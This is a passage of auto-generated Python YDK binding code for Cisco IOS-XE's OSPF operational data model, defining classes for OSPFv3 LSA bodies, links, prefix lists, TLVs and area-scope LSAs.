Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3PrefixList(Entity):
"""
OSPFv3 prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
self.yang_name = "ospfv3-prefix-list"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
"""
OSPFv3 intra\-area prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
"""
OSPF multi\-topology interface augmentation
.. attribute:: name (key)
One of the topology enabled on this interface
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
class Tlv(Entity):
"""
Link TLV
.. attribute:: link_type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_id
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_if_ipv4_addr
List of local interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: local_remote_ipv4_addr
List of remote interface IPv4 addresses
**type**\: union of the below types:
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: list of str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: te_metric
TE metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: max_bandwidth
Maximum bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: max_reservable_bandwidth
Maximum reservable bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: unreserved_bandwidth
Unrseerved bandwidth
**type**\: :py:class:`Decimal64<ydk.types.Decimal64>`
**range:** \-92233720368547758.08..92233720368547758.07
**config**\: False
.. attribute:: admin_group
Administrative group/Resource class/Color
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
self.yang_name = "tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
])
self.link_type = None
self.link_id = None
self.local_if_ipv4_addr = []
self.local_remote_ipv4_addr = []
self.te_metric = None
self.max_bandwidth = None
self.max_reservable_bandwidth = None
self.unreserved_bandwidth = None
self.admin_group = None
self._segment_path = lambda: "tlv"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
class UnknownSubTlv(Entity):
"""
OSPFv2 Unknown sub TLV
.. attribute:: type (key)
TLV type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: length
TLV length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: value
TLV value
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
self.yang_name = "unknown-sub-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
"""
List OSPF area scope LSA databases
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
